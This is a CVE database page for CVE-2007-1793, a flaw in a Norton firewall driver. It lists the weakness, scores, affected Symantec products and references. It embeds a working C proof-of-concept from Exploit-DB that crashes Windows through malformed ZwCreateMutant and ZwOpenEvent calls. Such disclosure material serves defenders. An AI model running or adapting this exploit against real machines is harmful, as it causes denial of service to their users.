CVE-2007-1793 : Detail

CVE-2007-1793

A03-Injection
0.07%V3
Local
2007-04-02
20h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SPBBCDrv.sys in Symantec Norton Personal Firewall 2006 9.1.0.33 and 9.1.1.7 does not validate certain arguments before being passed to hooked SSDT function handlers, which allows local users to cause a denial of service (crash) or possibly execute arbitrary code via crafted arguments to the (1) NtCreateMutant and (2) NtOpenEvent functions. NOTE: it was later reported that Norton Internet Security 2008 15.0.0.60, and possibly other versions back to 2006, are also affected.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29810

Publication date : 2007-03-31 22h00 +00:00
Author : David Matousek
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/23241/info Multiple Symantec products are prone to a local denial-of-service vulnerability. This issue occurs when attackers supply invalid argument values to the 'SPBBCDrv.sys' driver. A local attacker may exploit this issue to crash affected computers, denying service to legitimate users. /* Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF) Usage: prog FUNCNAME FUNCNAME - name of function to be checked Description: This program calls given function with parameters that cause the crash of the system. This happens because of insufficient check of function arguments in the driver of the firewall. Test: Running the testing program with the name of function from the list of functions with insufficient check of arguments. */ #undef __STRICT_ANSI__ #include <stdio.h> #include <string.h> #include <windows.h> #include <ddk/ntapi.h> #include <ddk/ntifs.h> void about(void) { printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF)\n"); printf("Windows Personal Firewall analysis project\n"); printf("Copyright 2007 by Matousec - Transparent security\n"); printf("http://www.matousec.com/""\n\n"); return; } void usage(void) { printf("Usage: test FUNCNAME\n" " FUNCNAME - name of function to be checked\n"); return; } int main(int argc,char **argv) { about(); if (argc!=2) { usage(); return 1; } if (!stricmp(argv[1],"NtCreateMutant") || !stricmp(argv[1],"ZwCreateMutant")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwCreateMutant(&handle,0,&oa,FALSE); } else if (!stricmp(argv[1],"NtOpenEvent") || !stricmp(argv[1],"ZwOpenEvent")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwOpenEvent(&handle,0,&oa); } else printf("\nI do not know how to exploit the vulnerability using this function.\n"); printf("\nTEST FAILED!\n"); return 1; }

Products Mentioned

Configuraton 0

Symantec>>Antivirus >> Version 10.0

    Symantec>>Antivirus >> Version 10.0.1

      Symantec>>Antivirus >> Version 10.0.1.1

        Symantec>>Antivirus >> Version 10.0.2

          Symantec>>Antivirus >> Version 10.0.2.1

            Symantec>>Antivirus >> Version 10.0.2.2

              Symantec>>Antivirus >> Version 10.0.3

                Symantec>>Antivirus >> Version 10.0.4

                  Symantec>>Antivirus >> Version 10.0.5

                    Symantec>>Antivirus >> Version 10.0.6

                      Symantec>>Antivirus >> Version 10.0.7

                        Symantec>>Antivirus >> Version 10.0.8

                          Symantec>>Antivirus >> Version 10.0.9

                            Symantec>>Client_security >> Version 3.0

                            Symantec>>Client_security >> Version 3.0.0.359

                            Symantec>>Client_security >> Version 3.0.1.1000

                            Symantec>>Client_security >> Version 3.0.1.1001

                            Symantec>>Client_security >> Version 3.0.1.1007

                            Symantec>>Client_security >> Version 3.0.1.1008

                            Symantec>>Client_security >> Version 3.0.1.1009

                              Symantec>>Client_security >> Version 3.0.2

                              Symantec>>Client_security >> Version 3.0.2.2000

                              Symantec>>Client_security >> Version 3.0.2.2001

                              Symantec>>Client_security >> Version 3.0.2.2002

                              Symantec>>Client_security >> Version 3.0.2.2010

                              Symantec>>Client_security >> Version 3.0.2.2011

                              Symantec>>Client_security >> Version 3.0.2.2020

                              Symantec>>Client_security >> Version 3.0.2.2021

                              Symantec>>Client_security >> Version 3.1

                              Symantec>>Client_security >> Version 3.1.0.396

                              Symantec>>Client_security >> Version 3.1.0.401

                              Symantec>>Client_security >> Version 3.1.394

                              Symantec>>Client_security >> Version 3.1.396

                              Symantec>>Client_security >> Version 3.1.400

                              Symantec>>Client_security >> Version 3.1.401

                                Symantec>>Norton_360 >> Version 1.0

                                  Symantec>>Norton_antispam >> Version 2004

                                    Symantec>>Norton_antispam >> Version 2005

                                      Symantec>>Norton_antivirus >> Version 2004

                                      Symantec>>Norton_antivirus >> Version 2005

                                        Symantec>>Norton_antivirus >> Version 2006

                                          Symantec>>Norton_antivirus >> Version 2007

                                            Symantec>>Norton_antivirus >> Version 2008

                                              Symantec>>Norton_internet_security >> Version 2004

                                              Symantec>>Norton_internet_security >> Version 2005

                                                Symantec>>Norton_internet_security >> Version 2006

                                                  Symantec>>Norton_internet_security >> Version 2007

                                                    Symantec>>Norton_internet_security >> Version 2008

                                                      Symantec>>Norton_personal_firewall >> Version 2004

                                                        Symantec>>Norton_personal_firewall >> Version 2005

                                                          Symantec>>Norton_personal_firewall >> Version 2006

                                                            Symantec>>Norton_personal_firewall >> Version 2006_9.1.0.33

                                                              Symantec>>Norton_personal_firewall >> Version 2006_9.1.1.7

                                                                Symantec>>Norton_system_works >> Version 2004

                                                                Symantec>>Norton_system_works >> Version 2005

                                                                  Symantec>>Norton_system_works >> Version 2006

                                                                    References

                                                                    http://www.vupen.com/english/advisories/2007/1192
                                                                    Tags : vdb-entry, x_refsource_VUPEN
                                                                    http://www.securitytracker.com/id?1021386
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securitytracker.com/id?1017837
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securityfocus.com/bid/23241
                                                                    Tags : vdb-entry, x_refsource_BID
                                                                    http://www.securitytracker.com/id?1021388
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securitytracker.com/id?1021389
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://osvdb.org/34692
                                                                    Tags : vdb-entry, x_refsource_OSVDB
                                                                    http://www.securitytracker.com/id?1017838
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://www.securitytracker.com/id?1021387
                                                                    Tags : vdb-entry, x_refsource_SECTRACK
                                                                    http://secunia.com/advisories/24677
                                                                    Tags : third-party-advisory, x_refsource_SECUNIA